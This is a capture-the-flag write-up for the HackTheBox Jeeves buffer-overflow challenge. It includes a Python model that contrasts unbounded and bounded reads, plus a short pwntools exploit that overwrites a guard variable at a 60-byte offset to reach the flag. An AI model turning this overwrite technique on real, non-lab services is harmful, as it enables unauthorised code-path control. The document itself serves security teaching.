We covered a scenario of a binary vulnerable to a buffer overflow. The binary has NX and PIE protections enabled, so we opened it in Ghidra and built the exploitation methodology around calculating the offsets of the input buffer and of another variable that guards an if statement which prints the flag. The objective was to control the value of that variable so that execution enters the if statement. This was part of the HackTheBox Jeeves challenge in the Intro to Binary Exploitation track.
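To make the offset reasoning concrete, the following is an added illustration (not code from the writeup or the challenge) that models the stack frame described above as a byte array: a 60-byte input buffer followed directly by the 8-byte variable the if statement checks. It contrasts an unbounded read, which lets input run past the buffer into that variable, with a bounded read that stops at the buffer's end. The 60-byte offset comes from the writeup; the expected value 0x1337 and the frame layout are constructed assumptions, not the challenge's real values.

```python
import struct

BUF_SIZE = 60              # distance from the input buffer to the checked variable (from the writeup)
VAR_SIZE = 8               # the checked variable is an 8-byte integer (assumption)
FRAME_SIZE = BUF_SIZE + VAR_SIZE
EXPECTED = 0x1337          # constructed stand-in for the constant the if statement compares against


def p64(value):
    """Little-endian 8-byte packing, equivalent to pwntools' p64."""
    return struct.pack("<Q", value)


def build_payload(value, offset=BUF_SIZE):
    """Padding up to the checked variable, then the value to place in it."""
    return b"A" * offset + p64(value)


def new_frame():
    """Fresh frame: buffer zeroed, checked variable initialised to 0 (not EXPECTED)."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, BUF_SIZE, 0)
    return frame


def unbounded_read(frame, data):
    """Model of gets()/scanf("%s"): copies every input byte, past the buffer
    and into whatever follows it in the frame (clipped at the frame end so the
    model does not 'crash')."""
    end = min(len(data), len(frame))
    frame[:end] = data[:end]
    return frame


def bounded_read(frame, data, limit=BUF_SIZE):
    """Model of fgets(buf, sizeof buf, stdin) / read(fd, buf, sizeof buf):
    never writes beyond the buffer, so adjacent variables are untouched."""
    data = data[:limit]
    frame[:len(data)] = data
    return frame


def checked_variable(frame):
    """Read the 8-byte variable that sits right after the buffer."""
    return struct.unpack_from("<Q", frame, BUF_SIZE)[0]


def branch_taken(read_fn, payload, expected=EXPECTED):
    """True if, after the read, the variable equals what the if statement expects."""
    frame = new_frame()
    read_fn(frame, payload)
    return checked_variable(frame) == expected


if __name__ == "__main__":
    payload = build_payload(EXPECTED)
    print("unbounded read, correct offset :", branch_taken(unbounded_read, payload))
    print("unbounded read, offset off by 1:", branch_taken(unbounded_read, build_payload(EXPECTED, 59)))
    print("bounded read, same payload     :", branch_taken(bounded_read, payload))
```

Running it shows why the padding length has to equal the exact distance between the two variables (an off-by-one leaves the 8 bytes misaligned and the comparison fails), and that a read bounded to the buffer size leaves the guard variable at its original value regardless of the input, which is the fix a developer would apply.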
Buffer Overflow Techniques Notes
Exploit code is below
##Beginning
from pwn import *

# Placeholders: the writeup does not give the instance address or the
# constant the if statement expects. Fill these in from the challenge
# instance and the Ghidra decompilation.
TARGET_IP = "ip"
TARGET_PORT = 0
VALUE = 0

# Connect directly to the challenge service (pwntools' remote() replaces
# spawning nc and sending "ip port" to it, which nc would not accept).
target = remote(TARGET_IP, TARGET_PORT)

# 60 bytes of padding fill the input buffer and reach the variable the
# if statement checks; p64() appends VALUE as 8 little-endian bytes.
# Everything is kept as bytes, so no decode() round-trip is needed.
payload = b"A" * 60 + p64(VALUE)
target.sendline(payload)

# Read the response (including the flag) up to the first "."
print(target.recvuntil(b"."))
##Ending
Video Walkthrough